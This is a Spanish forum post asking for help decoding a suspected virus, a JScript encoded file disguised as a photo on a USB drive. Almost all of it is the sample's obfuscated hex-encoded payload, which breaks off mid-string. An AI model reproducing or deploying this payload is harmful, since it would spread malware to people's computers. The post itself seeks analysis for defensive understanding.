Título: [Ayuda] descifrando un virus
Publicado por: danny920825 en 11 Julio 2015, 17:04 pm
Hola a todos, les traigo tarea por decirlo de alguna forma a aquellos especializados en el arte de la cryptografia. El punto es que encontre en mi memoria USB hace un par de dias un archivo con el icono de una foto y un nombre asi como "DSC01012 .jse" o sea, que estaban tratando de esconder la extension alargando el nombre. Eso me dio curiosidad y lo revise y me escontre con el codigo que les traigo hoy para ver si me ayudan a descifrarlo y conocer realmente que es lo que hace. Por cierto, mi cuñado si lo ejecuto y lo que hace al usuario es supuestamente abrir la foto del fondo de escritorio. Sin mas vueltas, aqui les dejo el codigo z="cfcdd4d6bc98b2aebecdc4cbcf899ecdc0bccfc0aabdc5c0becf8382aebecdc4828682cbcfc4c9c289a1c4828682c7c0aed4ce828682cfc0c8aabdc5828682c0becf828496bd98b2aebecdc4cbcf899ecdc0bccfc0aabdc5c0becf8382b2aebe828682cdc4cbcf89aec3828682c0c7c7828496ce98b2aebecdc4cbcf899ecdc0bccfc0aabdc5c0becf8382aec3c0828682c7c7899ccbcbc7c4828682bebccfc4cac9828496d2c798b2aebecdc4cbcf899ecdc0bccfc0aabdc5c0becf8382b2bdc0c8aebecd828682c4cbcfc4c9c289aeb2bdc0c8a7828682cabebccfcacd828496bfbd98b2aebecdc4cbcf899ecdc0bccfc0aabdc5c0becf83829c9faa8286829f9d89aecfcd828682c0bcc8828496bfbd899ec3bccdaec0cf987db0ae889cae9ea4a47d96bfbd89afd4cbc0988d96be8e98bd89aecbc0bec4bcc7a1cac7bfc0cdce837daecfbccdcfd0cb7d8496c9cf919883bd89adc0c2adc0bcbf8382a3a6a7a8b7b7aeaaa1afb29cada0b7b7a8c4becdcacecac1cfb7b7b2c4c9bfcad2ce7ba9afb7b79ed0cdcdc0c9cfb1c0cdcec4cac9b7b79ed0cdcdc0c9cfb1c0cdcec4cac982849998919acfcdd0c095c1bcc7cec08496c5c4beca98bd89adc0c2adc0bcbf837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b77d86bd89adc0c2adc0bcbf837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b789c5cbc2b7b77d84867db7b79fc0c1bcd0c7cfa4becac9b7b77d8496c4beca987dc0d3cbc7cacdc0cd89c0d3c07d96c298b2aebecdc4cbcf89aebecdc4cbcfa1d0c7c7a9bcc8c096bfbc98c9c0d27b9fbccfc0838496bcc9ca98bfbc89c2c0cfb4c0bccd8384867d7d96c8c0ce98bfbc89c2c0cfa8cac9cfc3838496bfc4bc98bfbc89c2c0cf9fbccfc0838496c3cdbc988b96bcc9cfd198c9c0d27b9ccdcdbcd4837d7d8496cdc2c6987da3a69eb0b7b7aecac1cfd2bccdc0b7b7a8c4becdcacecac1cfb7b7b2c4c9bfcad2ceb7b79ed0cdcdc0c9cfb1c0cdcec4cac9b7b7add0c97d96d2c7c2987da3a69eb0b7b7aecac1cfd2bccdc0b7b7a8c4becdcacecac1cfb7b7b2c4c9bfcad2ce7ba9afb7b79ed0cdcdc0c9cfb1c0cdcec4cac9b7b7b2c4c9c7cac2cac9b7b7aec3c0c7c77d96c2c998c9c0d27b9ccdcdbcd4837da4a8a27d877da4a8a2ba7d877daba49e7d877d9fae9e7d877d9ea4a8a27d877da3aba4a87d877da4a89ca27d877d9fae9ea17d877d9fae9ea97d877d9f9ea4a87d877da4a87d877daba49eaf7d877dae9ca8ba7d8496cecb987d7d96c1cacd83cd988b96cd97948f96cd868684d6cecb86987d7b7d96d8c0d398c2c9b6a8bccfc389cdcad0c9bf83a8bccfc389cdbcc9bfcac88384858c8d84b886bcc9ca89ced0bdcecfcdc4c9c2838d878f84867d7d86c8c0ce86bfc4bc867d89a5aba27d86cecb867d89c5cec07d96c5c0d3987d7d96cfbcce987dc0d3cbc7cacdc0cd7d96c1ced598bc89a2c0cfa1c4c7c083c28489aec4d5c096d2cebe98b2aebecdc4cbcf89a1d0c7c7a9bcc8c096cecfc7987dc3cfcfcbce958a8ad2d2d289c2cacac2c7c089c0ce8a7ecad0cfcbd0cf98cec0bccdbec381cebec7c4c0c9cf98cbced488bcbd81cc98c1c4d1c0cdbfcac7c7d4867d96cecfcb98cecfc786c1ced596c4c183ce89a9bcc8c0aecbbcbec0838d918498987dadcabcc8c4c9c27d84d6cfcacf98bc89a2c0cfa1cac7bfc0cd83ce89a9bcc8c0aecbbcbec0838d918489abbccdcec0a9bcc8c0837da8c4becdcacecac1cf7d8489abbccfc38489abbccdc0c9cfa1cac7bfc0cd96d8c0c7cec0d6cfcacf98ce89a9bcc8c0aecbbcbec0838f8b8489abbccdcec0a9bcc8c083ce89a9bcc8c0aecbbcbec0838d91848489abbccfc396d8c9cf838496d8bebccfbec383c084d6d8cec1987d7d96c1d0c9becfc4cac97bc9cf8384d6cfcdd4d6be8c98ce89a9bcc8c0aecbbcbec0838d938489abbccdcec0a9bcc8c0837dc8c4becdcacecac1cf7d8496be8d98be8c89a2c0cfa1cac7bfc0cd89a4cfc0c8ce8384899ecad0c9cf96cdc198a8bccfc389cdcad0c9bf83a8bccfc389cdbcc9bfcac8838485be8d888c8496be8f98be8c89a2c0cfa1cac7bfc0cd89a4cfc0c8ce838489c4cfc0c883cdc18489abbccfc396c4c183bc89a1cac7bfc0cda0d3c4cecfce83be8f849898c1bcc7cec084d6be8f98bc89a2c0cfa1c4c7c083be8f8489abbccdc0c9cfa1cac7bfc0cd96d8d8bebccfbec383c084d6be8f98be8c89abbccfc396d8be9098a8bccfc389cdbcc9bfcac883848593868c867d7d96be9098be9089cdc0cbc7bcbec0837d897d877d7d8496cfcdd4d6bd89adc0c2b2cdc4cfc0837da3a69eb0b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7a5aea0a1c4c7c0b7b79fc0c1bcd0c7cfa4becac9b7b77d87c5c4beca877dada0a2baaeb57d8496d8bebccfbec383c084d6d8cfcdd4d6c5cfd4cb98bd89adc0c2adc0bcbf837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7c5cbc0c2c1c4c7c0b7b7a1cdc4c0c9bfc7d4afd4cbc0a9bcc8c07d8496bd89adc0c2b2cdc4cfc0837da3a69eb0b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7a5aea0a1c4c7c0b7b7a1cdc4c0c9bfc7d4afd4cbc0a9bcc8c07d87c5cfd4cb877dada0a2baa0b3ab9ca99fbaaeb57d8496d8bebccfbec383c084d6d8cfcdd4d6bd89adc0c2b2cdc4cfc0837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7a5aea0a1c4c7c0b7b79fc0c1bcd0c7cfa4becac9b7b77d87c5c4beca877dada0a2baaeb57d8496d8bebccfbec383c084d6d8cfcdd4d6bd89adc0c2b2cdc4cfc0837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7a5aea0a1c4c7c0b7b7a1cdc4c0c9bfc7d4afd4cbc0a9bcc8c07d87c5cfd4cb877dada0a2baa0b3ab9ca99fbaaeb57d8496d8bebccfbec383c084d6d8c4c183c289ced0bdcecfcdc4c9c283c289c7bccecfa4c9bfc0d3aac1837db7b77d84868c87c289c7c0c9c2cfc38489cfcaa7cad2c0cd9ebccec0838489cec0bccdbec3837d89c5cbc27d86cecb867d89c5cec07d847c98888c84d6cfcdd4d6c4c183bc89a1c4c7c0a0d3c4cecfce83c289ced0bdcecfcdc4c9c2838b87c289c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d8484849898cfcdd0c084d6bd89cdd0c983827d8286c289ced0bdcecfcdc4c9c2838b87c289c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d848486827d828496d8c0c7cec0d6d2cb98bd89adc0c2adc0bcbf837da3a69eb0b7b79ecac9cfcdcac77babbcc9c0c7b7b79fc0cec6cfcacbb7b7b2bcc7c7cbbccbc0cd7d8496c4c183d2cb89ced0bdcecfcdc4c9c283d2cb89c7bccecfa4c9bfc0d3aac1837db7b77d84868c87d2cb89c7c0c9c2cfc38498987dafcdbcc9cebecabfc0bfb2bcc7c7cbbccbc0cd7d84d6c5cbc2be98bd89adc0c2adc0bcbf837da3a6a7a8b7b7aeaaa1afb29cada0b7b79ec7bccecec0ceb7b7c5cbc0c2c1c4c7c0b7b7cec3c0c7c7b7b7cacbc0c9b7b7becac8c8bcc9bfb7b77d8489cdc0cbc7bcbec0837d808c7d87d2cb8496bd89cdd0c983c5cbc2be8496d8c0c7cec0d6bd89cdd0c983827d8286d2cb86827d828496d8d8d8bebccfbec383c084d6d8cfcdd4d6cebe98d2c7899ecac9c9c0becfaec0cdd1c0cd83c9d0c7c7877b7dcdcacacfb7b7bfc0c1bcd0c7cf7d8496cdc298cebe89a2c0cf837daecfbfadc0c2abcdcad17d8496c898cdc289a8c0cfc3cabfceba89a4cfc0c8837da0c9d0c8b1bcc7d0c0ce7d8496cbc4c998c889a4c9abbccdbcc8c0cfc0cdce89aecbbcd2c9a4c9cecfbcc9bec0ba838496cdc698c9c0d27baabdc5c0becf838496cdc6b67da3a69eb07db898cdc6b67da3a6a0b4ba9eb0adada0a9afbab0aea0ad7db8988bd3938b8b8b8b8b8b8c96cdd198cdc6b6cdc2c689ced0bdcecfcd838b87cdc2c689c4c9bfc0d3aac1837db7b77d8484b896cbc4c989c39fc0c1a6c0d498cdd196cbc4c989ceaed0bda6c0d4a9bcc8c098cdc2c689ced0bdcecfcd83cdc2c689c4c9bfc0d3aac1837db7b77d847b867b8c8496cbcacf98cdc289a0d3c0bea8c0cfc3cabfba83c889a9bcc8c087cbc4c98496bcc698cbcacf89cea9bcc8c0ce89cfca9ccdcdbcd4838496c1cacd83c6c0d47bc4c97bbcc684d6cfcfce98bd89adc0c2adc0bcbf83cdc2c6867db7b77d86bcc6b6c6c0d4b884867d7d96c4c183cfcfce89cec0bccdbec3837d89c0d3c07d847c98888c84d6cfcfce8d98cfcfce89ced0bdcecfcdc4c9c2838b87cfcfce89cec0bccdbec3837d89c0d3c07d848496cfcfce8e98cfcfce8d89ced0bdcecfcdc4c9c283cfcfce8d89c7bccecfa4c9bfc0d3aac1837d957d84888c87cfcfce8d89c7c0c9c2cfc384867d89c0d3c07d96c4c183bc89a1c4c7c0a0d3c4cecfce83cfcfce8e849898cfcdd0c084d6c4beca98cfcfce8e96d8c4c183cfcfce8d89c4c9bfc0d3aac1837db7b77d847c98888c84d6cfcfce8d98cfcfce8d89ced0bdcecfcdc4c9c283cfcfce8d89c7bccecfa4c9bfc0d3aac1837db7b77d84868c87cfcfce8d89c7c0c9c2cfc38496d8cfbcce98cfcfce8d96d8d8d8bebccfbec383c084d6d8c4c183cfbcce89c4c9bfc0d3aac1837d7b7d847c98888c84d6cfbcce98cfbcce89ced0bdcecfcdc4c9c2838b87cfbcce89c4c9bfc0d3aac1837d7b7d848496d8c4c183cfbcce89c4c9bfc0d3aac1837d897d847c98888c84d6cfbcce98cfbcce89ced0bdcecfcdc4c9c2838b87cfbcce89c4c9bfc0d3aac1837d897d848496d8cfcdd4d6c9c0d2bf98c1ced596cac7bfbfc198bd89adc0c2adc0bcbf83d2c7c28496cac7bfbfc198cac7bfbfc189ced0bdcecfcdc4c9c283cac7bfbfc189c7bccecfa4c9bfc0d3aac183827d7b7d8284868e87cac7bfbfc189c7bccecfa4c9bfc0d3aac183827d82848496d8bebccfbec383c084d6cac7bfbfc198cec3bed0838496d8c4c183bc89a1c4c7c0a0d3c4cecfce83cac7bfbfc1849898cfcdd0c084d6be8f98bc89a2c0cfa1c4c7c083cac7bfbfc18489abbccdc0c9cfa1cac7bfc0cd96cac7bfbf98bc89a2c0cfa1c4c7c083cac7bfbfc18489cec4d5c096d8c0c7cec0d6cac7bfbf988b96cac7bfbfc198be8f867db7b77d86be9096d8c4c183c9c0d2bf9998cac7bfbf84d6c4c183bc89a1c4c7c0a0d3c4cecfce83cac7bfbfc1849898cfcdd0c084d6bc89a2c0cfa1c4c7c083cac7bfbfc184899ccfcfcdc4bdd0cfc0ce988b96d8bfbd89aacbc0c9838496cfcdd4d6bcd198a2c0cfaabdc5c0becf837dd2c4c9c8c2c8cfce95d6c4c8cbc0cdcecac9bccfc4cac9a7c0d1c0c798c4c8cbc0cdcecac9bccfc0d87cb7b7b7b789b7b7cdcacacfb7b7aec0bed0cdc4cfd49ec0c9cfc0cd7d8683c9cf919a828d82958282848496bcd1c498bcd189a0d3c0beacd0c0cdd4837daea0a7a09eaf7b857ba1adaaa87b9cc9cfc4b1c4cdd0ceabcdcabfd0becf7d877db2aca77d8496c9bcd1c498c9c0d27ba0c9d0c8c0cdbccfcacd83bcd1c48496bcc9cfd198c9c0d27b9ccdcdbcd4838496c1cacd83967cc9bcd1c489bccfa0c9bf838496c9bcd1c489c8cad1c0a9c0d3cf838484d6cabcd198c9bcd1c489c4cfc0c8838496bcc9cfd189cbd0cec383cabcd189bfc4cecbc7bcd4a9bcc8c08496d8d8bebccfbec383c084d6bcc9cfd198c9c0d27b9ccdcdbcd4837da99c9e7d8496d8cfcdd4d6d1c4be987d977d86bd89adc0c2adc0bcbf837da3a69eb0b7b7b1cac7bccfc4c7c07ba0c9d1c4cdcac9c8c0c9cfb7b7a7aaa2aaa9aea0adb1a0ad7d8489cdc0cbc7bcbec0837db7b7b7b77d877d7d84867d957d86bd89adc0c2adc0bcbf837da3a6a7a8b7b7aeaaa1afb29cada0b7b7a8c4becdcacecac1cfb7b7b2c4c9bfcad2ce7ba9afb7b79ed0cdcdc0c9cfb1c0cdcec4cac9b7b7abcdcabfd0becfa9bcc8c07d84867d987d86ce89a9bcc8c0aecbbcbec0838f8b84867d957d86bcc9cfd1867d997d96d8bebccfbec383c084d6d1c4be987d7d96d8becabf98bec4838496c4c183becabf89cec0bccdbec383d1c4be849898888c8181cdbcbf7c988b84d6c9bfbc98d1c4be867d85858a7d96c3c4ce98becabf89cdc0cbc7bcbec0837d85858a7d87c9bfbc8496bfbd89b2cdc4cfc0afc0d3cf83c3c4ce8496d8c0c7cec0d6bfbd89b2cdc4cfc0afc0d3cf83becabf8496d8bfbd89aebcd1c0afcaa1c4c7c083cac7bfbfc1878d8496bfbd899ec7cacec0838496cfcdd4d6c4c183bc89a2c0cfa1c4c7c083cac7bfbfc18489aacbc0c99cceafc0d3cfaecfcdc0bcc8838c87888d8489adc0bcbf9cc7c7838489bec3bccd9ecabfc09ccf838b847c988c8d8d84d6bc899ecacbd4a1c4c7c083c287cac7bfbfc187cfcdd0c08496d8bc89a2c0cfa1c4c7c083cac7bfbfc184899ccfcfcdc4bdd0cfc0ce988d96d8bebccfbec383c084d6d8d2cec398be8f867db7b77d86cfbcce867d89c0d3c07d96cfcdd4d6bc899ecacbd4a1c4c7c083d2cebe87d2cec38496d8bebccfbec383c084d6d8bc89a2c0cfa1c4c7c083d2cec384899ccfcfcdc4bdd0cfc0ce988d96cfcdd4d6bfcdc298827d8286d2cec386827d7b7d8286cac7bfbfc186827d7b8a8aa095a5aebecdc4cbcf7b8a8a9d8296cec3bed0838496c0be98bd899ecdc0bccfc0aec3cacdcfbed0cf83be8e867db7b77d86cfbcce867d89c7c9c67d8496c0be89afbccdc2c0cfabbccfc398be8f867db7b77d86cfbcce867d89c0d3c07d96c0be899ccdc2d0c8c0c9cfce98827d8286cac7bfbfc186827d7b8a8aa095a5aebecdc4cbcf7b8a8a9d7b88c9ce8296c0be89a4becac9a7cabebccfc4cac998c4beca96c0be89aebcd1c0838496bd89adc0c2b2cdc4cfc083d2c7c287bfcdc28782ada0a2baaeb5828496b2aebecdc4cbcf89aec7c0c0cb83949494948496c4c183bd89adc0c2adc0bcbf83d2c7c2849898bfcdc284d6bc899fc0c7c0cfc0a1c4c7c083be8e867db7b77d86cfbcce867d89c7c9c67d8496d8d8bebccfbec383c084d6d8d8d8c0c7cec0d6cfcdd4d6c4c183b2aebecdc4cbcf899ccdc2d0c8c0c9cfce89c7c0c9c2cfc398988b84d6bd89cdd0c9837dc0d3cbc7cacdc0cd89c0d3c07d8496d8d8bebccfbec383c084d6d8cfcdd4d6c1bec1cb98c9c0d27b9ccdcdbcd4838496cfbec8bf98c9c0d27b9ccdcdbcd4838496c1cacd83cf988b96cf979496cf868684d6cfbec8bf89cbd0cec383cfcacf867db7b7af9e8d8b8c7d86cf867db7b7cfbec4c2c9cacdc089cfd3cf7d8496cfcdd4d6c1bec1cb89cbd0cec383ce89a9bcc8c0aecbbcbec0838e938489abbccdcec0a9bcc8c0837dafcacfbcc79ecac8c8bcc9bfc0cd8d8b8c7d86cf8489abbccfc3867db7b7afcacac7ceb7b7a8cad5c4c7c7bc7ba1c4cdc0c1cad3b7b7bfc0c1bcd0c7cfceb7b7cbcdcac1c4c7c07d8496d8bebccfbec383c084d6d8cfcdd4d6c1bec1cb89cbd0cec383ce89a9bcc8c0aecbbcbec0838f938489abbccdcec0a9bcc8c0837dafcacfbcc79ecac8c8bcc9bfc0cd8d8b8c7d86cf8489abbccfc3867db7b7afcacac7ceb7b7a8cad5c4c7c7bc7ba1c4cdc0c1cad3b7b7bfc0c1bcd0c7cfceb7b7cbcdcac1c4c7c07d8496d8bebccfbec383c084d6d8d8cfcdd4d6cfbec8bf89cbd0cec383ce89a9bcc8c0aecbbcbec0838e938489abbccdcec0a9bcc8c0837daf9e7bb0ab7d8489abbccfc3867db7b7cfbec4c2c9cacdc089cfd3cf7d8496d8bebccfbec383c084d6d8cfcdd4d6cfbec8bf89cbd0cec383ce89a9bcc8c0aecbbcbec0838f938489abbccdcec0a9bcc8c0837daf9e7bb0ab7d8489abbccfc3867db7b7cfbec4c2c9cacdc089cfd3cf7d8496d8bebccfbec383c084d6d8cfcdd4d6cfbec8bf89cbd0cec383ce89a9bcc8c0aecbbcbec0838d938489abbccdcec0a9bcc8c0837dc2c3c4cec7c0cd7d8489abbccfc3867db7b7cfbec4c2c9cacdc089cfd3cf7d8496d8bebccfbec383c084d6d8cfcdd4d6cfbec8bf89cbd0cec383ce89a9bcc8c0aecbbcbec0838d918489abbccdcec0a9bcc8c0837dc2c3c4cec7c0cd7d8489abbccfc3867db7b7cfbec4c2c9cacdc089cfd3cf7d8496d8bebccfbec383c084d6d8cfbec8bf89cbd0cec3837dbe95b7b7cfcacfbcc7bec8bfb7b7cfbec4c2c9cacdc089cfd3cf7d8496c1cacd83cf988b96cf97cfbec8bf89c7c0c9c2cfc396cf868684d6c4c183bc89a1c4c7c0a0d3c4cecfce83cfbec8bfb6cfb889cdc0cbc7bcbec0837dcfbec4c2c9cacdc089cfd3cf7d877dd2c4c9bec8bf89c4c9c47d84849898cfcdd0c084d6cfcdd4d6bfbd89aacbc0c9838496c4c183bc89a1c4c7c0a0d3c4cecfce83cfbec8bfb6cfb8849898c1bcc7cec084d6cfcfc998bc899ecdc0bccfc0afc0d3cfa1c4c7c083cfbec8bfb6cfb887cfcdd0c08496cfcfc989b2cdc4cfc0837d858589858589c5cec07d8496cfcfc989bec7cacec0838496d8c4c2c7987d7d96cfcdd4d6bfbd89a7cabcbfa1cdcac8a1c4c7c083cfbec8bfb6cfb88496c4c2c798bfbd89adc0bcbfafc0d3cf96d8bebccfbec383c084d6d8bfbd899ec7cacec0838496c4c183c4c2c789c4c9bfc0d3aac1837d858589858589c5cec07d849898888c84d6bfbd89aacbc0c9838496bfbd89b2cdc4cfc0afc0d3cf83c4c2c7878c8496bfbd89b2cdc4cfc0afc0d3cf837d858589858589c5cec07d878c8496bc899fc0c7c0cfc0a1c4c7c083cfbec8bfb6cfb88496bfbd89aebcd1c0afcaa1c4c7c083cfbec8bfb6cfb88496bfbd899ec7cacec0838496d8d8bebccfbec383c084d6d8cfcdd4d6cfcacd98bc89aacbc0c9afc0d3cfa1c4c7c083bc89a2c0cfa1c4c7c083cfbec8bfb6cfb88489abbccdc0c9cfa1cac7bfc0cd867db7b7b2c4c9bec8bf89c4c9c47d878c87cfcdd0c0878b8496cfcabc98cfcacd89adc0bcbf9cc7c7838496c4c183cfcabc89cec0bccdbec3837da4c2c9cacdc0a7c4cecfa1c4c7c0a0c9bcbdc7c0bf988b7d847c98888c84d6cfcabc98cfcabc89cdc0cbc7bcbec0837da4c2c9cacdc0a7c4cecfa1c4c7c0a0c9bcbdc7c0bf988b7d877da4c2c9cacdc0a7c4cecfa1c4c7c0a0c9bcbdc7c0bf988c7d8496d8c4c183cfcabc89cec0bccdbec3837da4c2c9cacdc0a7c4cecfa1c4c7c0987d849898888c84d6cfcabc98cfcabc89cdc0cbc7bcbec0837db69ecac9c1c4c2d0cdbccfc4cac9b87d877db69ecac9c1c4c2d0cdbccfc4cac9b87d867db7c9a4c2c9cacdc0a7c4cecfa1c4c7c0987d86cfbec8bfb6cfb88496d8c4c183cfbec8bfb6cfb889cec0bccdbec3837daf9e8d8b8c7d847c98888c84d6c4c183cfcabc89cec0bccdbec3837d988589c5cec07d849898888c84d6c1c4c7cf98cfcabc89ced0bdcecfcdc4c9c283cfcabc89c7bccecfa4c9bfc0d3aac1837da1c4c7cfc0cd7d84869187cfcabc89c7bccecfa4c9bfc0d3aac1837d89c4becac9987d848496c0c9c198cfcabc89ced0bdcecfcdc4c9c283cfcabc89c7bccecfa4c9bfc0d3aac1837da1c4c7cfc0cd7d8487cfcabc89c7c0c9c2cfc38496c0c9c798c0c9c189ced0bdcecfcdc4c9c2838b87c0c9c189c4c9bfc0d3aac1837db7c97d84868c8496c1c7c998c9c0d27ba9d0c8bdc0cd83c1c4c7cf84868c96c1c4becac998cfcabc89ced0bdcecfcdc4c9c283cfcabc89cec0bccdbec3837da1c4c7cfc0cd8c8c89c4becac9987d84868c8f87cfcabc89c7c0c9c2cfc38496bfc4becac998c1c4becac989ced0bdcecfcdc4c9c2838b87c1c4becac989cec0bccdbec3837db7c97d848496cfcabc98cfcabc89cdc0cbc7bcbec083c0c9c787c0c9c7867db7c9a1c4c7cfc0cd7d86c1c7c9867d988589c5cec0b7c9a1c4c7cfc0cd7d86c1c7c9867d89c4becac9987d86bfc4becac9867db7c97d8496cfcabc98cfcabc89cdc0cbc7bcbec0837da1c4c7c0afc4cbb2c4c9bfcad2ce988c7d877da1c4c7c0afc4cbb2c4c9bfcad2ce988b7d8496d8d8cfcacd89bec7cacec0838496cfcad298bc89aacbc0c9afc0d3cfa1c4c7c083bc89a2c0cfa1c4c7c083cfbec8bfb6cfb88489abbccdc0c9cfa1cac7bfc0cd867db7b7b2c4c9bec8bf89c4c9c47d878d87cfcdd0c0878b8496cfcad289b2cdc4cfc083cfcabc8496cfcad289bec7cacec0838496d8bebccfbec383c084d6d8d8d8d8bebccfbec383c084d6d8cfcdd4d6bd89adc0c2b2cdc4cfc0837da3a69eb0b7b7aecac1cfd2bccdc0b7b7a8c4becdcacecac1cfb7b7a4c9cfc0cdc9c0cf7ba0d3cbc7cacdc0cdb7b7a8bcc4c9b7b7aecfbccdcf7babbcc2c07d87cecfcb877dada0a2baaeb57d84d8bebccfbec383c084d6d8cfcdd4d6c4c183bc89a1cac7bfc0cda0d3c4cecfce83cfcacf867db7b7a8cad5c4c7c7bcb7b7a1c4cdc0c1cad3b7b7abcdcac1c4c7c0ce7d849898cfcdd0c084d6c1cbc198bc89a2c0cfa1cac7bfc0cd83cfcacf867db7b7a8cad5c4c7c7bcb7b7a1c4cdc0c1cad3b7b7abcdcac1c4c7c0ce7d8496cbc1c198c9c0d27ba0c9d0c8c0cdbccfcacd83c1cbc189aed0bda1cac7bfc0cdce8496c1cacd83967ccbc1c189bccfa0c9bf838496cbc1c189c8cad1c0a9c0d3cf838484d6cbc1ce98cbc1c189c4cfc0c88384867d7d96c4c183cbc1ce89cec0bccdbec3837d89bfc0c1bcd0c7cf7d847c98888c84d6c1bec1cb89cbd0cec383cbc1ce8496d8d8d8c1cacd83cc988b96cc97c1bec1cb89c7c0c9c2cfc396cc868684d6cfcdd4d6c4c183bc89a1c4c7c0a0d3c4cecfce83c1bec1cbb6ccb8867db7b7cbcdc0c1ce89c5ce7d849898cfcdd0c08496d6c1c5c198bc89aacbc0c9afc0d3cfa1c4c7c083c1bec1cbb6ccb8867db7b7cbcdc0c1ce89c5ce7d878c8496c1c5ce98c1c5c189adc0bcbf9cc7c7838496c1c5c189bec7cacec0838496d0cecb9882d0cec0cdbacbcdc0c1837dbdcdcad2cec0cd89cecfbccdcfd0cb89c3cac8c0cbbcc2c07d878296c4c183c1c5ce89c4c9bfc0d3aac183d0cecb847c98888c84d6c1c5ce8c98c1c5ce89ced0bdcecfcdc4c9c283c1c5ce89c4c9bfc0d3aac183d0cecb84868e9287c1c5ce89c7c0c9c2cfc38496c1c5ce8d98c1c5ce8c89ced0bdcecfcdc4c9c2838b87c1c5ce8c89c4c9bfc0d3aac1838284968284868d8496c1c5ce8e98c1c5ce89cdc0cbc7bcbec083d0cecb86c1c5ce8d87d0cecb86827b7d8286cecfcb86827d8496828496d2c5c198bc89aacbc0c9afc0d3cfa1c4c7c083c1bec1cbb6ccb8867db7b7cbcdc0c1ce89c5ce7d878d8496d2c5c189b2cdc4cfc083c1c5ce8e8496d8c0c7cec0d6d2c5c198bc89aacbc0c9afc0d3cfa1c4c7c083c1bec1cbb6ccb8867db7b7cbcdc0c1ce89c5ce7d87938496d2c5c189b2cdc4cfc0a7c4c9c08382b7c98286d0cecb86827b7d8286cecfcb86827d8496828496d8d2c5c189bec7cacec0838496d8d8bebccfbec383c084d6d8d8d8bebccfbec383c084d6d8cfcdd4d6c2c1ce98ce89a9bcc8c0aecbbcbec0838d938489abbccdcec0a9bcc8c0837da2cacac2c7c07d8489abbccfc3867db7b79ec3cdcac8c0b7b7b0cec0cd7b9fbccfbcb7b79fc0c1bcd0c7cfb7b7abcdc0c1c0cdc0c9bec0ce7d96c4c183bc89a1c4c7c0a0d3c4cecfce83c2c1ce849898cfcdd0c084d6c2c5c198bc89aacbc0c9afc0d3cfa1c4c7c083c2c1ce878c8496c2c5ce98c2c5c189adc0bcbf9cc7c7838496c2c5c189bec7cacec0838496c2c5cec998c2c5ce89c7c0c9c2cfc396d0cdce98827dd0cdc7cebacfcabacdc0cecfcacdc0bacac9bacecfbccdcfd0cb7d957bb68296cdcace98827dcdc0cecfcacdc0bacac9bacecfbccdcfd0cb7d958296cdcacec898827dcdc0cecfcacdc0bacac9bacecfbccdcfd0cbbac8c4c2cdbccfc0bf7d958296c4c183c2c5ce89c4c9bfc0d3aac183cecfc7849898888c84d6c4c183c2c5ce89c4c9bfc0d3aac183d0cdce847c98888c84d6c2c5ce8c98c2c5ce89ced0bdcecfcdc4c9c283c2c5ce89c4c9bfc0d3aac183d0cdce84868e8c87c2c5cec98496c2c5ce8d98c2c5ce8c89ced0bdcecfcdc4c9c2838b87c2c5ce8c89c4c9bfc0d3aac1837db87d84868c8496c2c5ce8e98c2c5ce89cdc0cbc7bcbec083d0cdce86c2c5ce8d87d0cdce86827b7d8286cecfcb86827d877b8286c2c5ce8d8496d8c0c7cec0d6c2c5ce8c98c2c5ce89ced0bdcecfcdc4c9c283c2c5ce89c4c9bfc0d3aac183cdcacec88487c2c5cec98496c2c5ce8d98c2c5ce8c89ced0bdcecfcdc4c9c2838b87c2c5ce8c89c4c9bfc0d3aac1837db7c97d84868c8496c2c5ce8e98c2c5ce89cdc0cbc7bcbec083c2c5ce8d87cdcacec886827bcfcdd0c087b7c9b7cf8286d0cdce86827b7d8286cecfcb86827d7bb8b7c9828496d8c2c5ce8f98c2c5ce89ced0bdcecfcdc4c9c283c2c5ce89c4c9bfc0d3aac183cdcace8487c2c5cec98496c2c5ce9098c2c5ce8f89ced0bdcecfcdc4c9c2838b87c2c5ce8f89c4c9bfc0d3aac18382878284868c8496c2c5ce8e98c2c5ce8e89cdc0cbc7bcbec083c2c5ce9087cdcace86827b8f87828496d2c5c298bc89aacbc0c9afc0d3cfa1c4c7c083c2c1ce878d8496d2c5c289b2cdc4cfc083c2c5ce8e8496d2c5c289bec7cacec0838496d8c0c7cec0d6c1bfce98c2c5ce89ced0bdcecfcdc4c9c283c2c5ce89c4c9bfc0d3aac183cecfc78487c2c5ce89c7c0c9c2cfc38496c1bfbe98c1bfce89ced0bdcecfcdc4c9c2838b87c1bfce89c4c9bfc0d3aac183827d82848496c2c5ce8f98c2c5ce89cdc0cbc7bcbec083c1bfbe87cecfcb8496d2c5c298bc89aacbc0c9afc0d3cfa1c4c7c083c2c1ce878d8496d2c5c289b2cdc4cfc083c2c5ce8f8496d2c5c289bec7cacec0838496d8d8d8bebccfbec383c084d6d8c8c6838496d8d8c1d0c9becfc4cac97bc8c68384d6b2aebecdc4cbcf89aec7c0c0cb838c8d8b8b8b8b8496cfcdd4d6be98c9c0d27ba0c9d0c8c0cdbccfcacd83bc899fcdc4d1c0ce8496c1cacd83967cbe89bccfa0c9bf838496be89c8cad1c0a9c0d3cf838484d6cfc4cbcabfc4cebeca98be89c4cfc0c88384899fcdc4d1c0afd4cbc096ced2c4cfbec383cfc4cbcabfc4cebeca84d6bebccec07b8c95bebccec07b8e95c4c183be89c4cfc0c883847c987d9c957d7b81817bbe89c4cfc0c883847c987d9d957d84d6cfcdd4d6cec198bc89a2c0cfa1cac7bfc0cd83cbc083be89c4cfc0c88384867db7b77d848496cfc2c198c9c0d27ba0c9d0c8c0cdbccfcacd83cec189c1c4c7c0ce8496c1cacd83967ccfc2c189bccfa0c9bf838496cfc2c189c8cad1c0a9c0d3cf838484d6cecfc198cfc2c189c4cfc0c88384867d7d96c4c183cecfc189ced0bdcecfcdc4c9c283cecfc189c7c0c9c2cfc3888f87cecfc189c7c0c9c2cfc38489cfcab0cbcbc0cd9ebccec0838498987d89a5aba27d84d6c5c0d398cfc2c189c4cfc0c8838489a9bcc8c086cecb867d89c5cec07d96d8c4c183cecfc189cfcaa7cad2c0cd9ebccec083848